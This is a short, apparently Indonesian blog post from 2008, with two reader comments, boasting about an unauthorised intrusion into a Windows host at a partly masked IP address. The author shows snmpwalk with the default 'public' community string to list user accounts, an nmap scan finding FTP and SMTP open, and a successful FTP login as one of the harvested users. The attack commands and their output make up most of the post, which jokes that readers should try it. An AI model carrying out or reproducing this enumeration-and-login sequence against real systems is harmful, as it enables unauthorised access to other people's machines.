Wednesday, May 14, 2008

1Ciddish pwn1ng a winb0x



This is a simple scenario that would reveal :), Some machine has unconfigure snmp, so a bad guy can "walking" on his snmp request with OID to obtain the list of lanman users .. tadda
devil@venom ~ $ sudo snmpwalk -v 1 -c public 202.x.155.x OID
STRING: "Guest"
STRING: "ASPNET"
STRING: "angely"
STRING: "SQLDebugger"
STRING: "Administrator"
STRING: "TsInternetUser"
STRING: "IUSR_SCC-ZR574A805WI"
STRING: "IWAM_SCC-ZR574A805WI"
GOt username? try some remote connection services,
devil@venom ~ $ nmap -vv 202.x.155.x -p 20-25 | grep open
Discovered open port 21/tcp on 202.x.155.x
Discovered open port 25/tcp on 202.x.155.x
21/tcp open ftp
25/tcp open smtp
devil@venom ~ $
Most way, uname/passwd.. and tadda
devil@venom ~ $ ftp
ftp> o 202.x.155.x
Connected to 202.x.155.x(202.x.155.x).
220 ANGSRV Microsoft FTP Service (Version 5.0).
Name (202.x.155.x:devil): angely
500 'AUTH SSL': command not understood
SSL not available
331 Password required for angely.
Password:
230 User angely logged in.
Remote system type is Windows.
ftp> bye
221
Kids, (only)just try this at home. ?Yeah, well it just on another daily boring "working" days,
new technique? not really... just lucky

images are property of http://www.sdm-net.org



2 comments:

  1. snmpwalknya kenapa perlu sudo?

    ReplyDelete
  2. *jangan ketawa ya om, "cuma karena kebiasaaan aja :))" (dari ubuntu sampe gentoo)

    ReplyDelete